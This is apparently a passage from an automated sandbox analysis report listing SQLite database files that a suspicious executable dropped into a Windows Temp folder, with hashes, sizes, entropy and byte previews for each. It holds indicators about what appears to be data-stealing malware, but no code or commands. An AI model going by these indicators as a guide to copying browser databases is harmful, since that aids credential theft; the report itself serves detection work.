                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\d3v80ZAQNr

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\d5gBn5XFo2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\dAVbtvBRST

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\drvVyvpjkm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\dzs8cpqyOd

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\eAOZw6DVMq

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\eDp9IifNt9

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\eKbHtOofpr

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\eaNN5fWDOe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ecnjseGBg4

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\fDFHbrYPr0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\fGFZUWi583

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\fvRXkhz3Kc

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\fxOBIudSQD

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gE8md6hSrD

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gQf0ykWsrL

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gZ9hhFJBTT

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gj8TZqX3lo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\goMuilCRQw

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\gtTxagFtU6

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
